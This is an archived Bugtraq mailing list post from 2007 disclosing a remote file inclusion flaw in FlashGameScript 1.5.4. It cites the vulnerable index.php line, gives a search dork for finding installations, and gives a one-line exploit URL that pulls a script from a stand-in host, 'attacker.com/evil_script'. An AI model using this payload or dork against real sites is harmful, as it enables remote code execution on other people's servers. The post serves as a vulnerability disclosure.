Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

FlashGameScript v1.5.4 Remote File Inclusion Vulnerability

From: malic89 () gmail com
Date: 21 Feb 2007 13:26:59 -0000
--------------------------------------------------------
Author          : JuMp-Er
Date            : feb, 21th 2007
Level           : Dangerous
contact:        : aH-crew[at]hotmail[dot]com
--------------------------------------------------------


Software description
--------------------------------------------------------
App             :FlashGameScript
Version         :1.5.4
URL             :http://www.flashgamescript.com/
Dork            :Copyright © 2006-2007 Powered by FlashGameScript.com version 1.5 All Rights Reserved 
Price:          :$60
Description :
Flash Game Script is the latest arcade website script created by developers at ghoney.com and will be market by folks 
at FlashGameScript.com.
Our game site script is created to maximized arcade site owner’s profit with additional plug-in for alternative income 
opportunities.
-------------------------------------------------------


Vulnerability:
---------------
        
at index.php line 28: $func =$_GET[func];
---------------
Exploit:

http://www.target.com/index.php?func=http://attacker.com/evil_script?

---------------

Greetz to all members of active. Hacking Crew
Previous By Date Next
Previous By Thread Next

Current thread: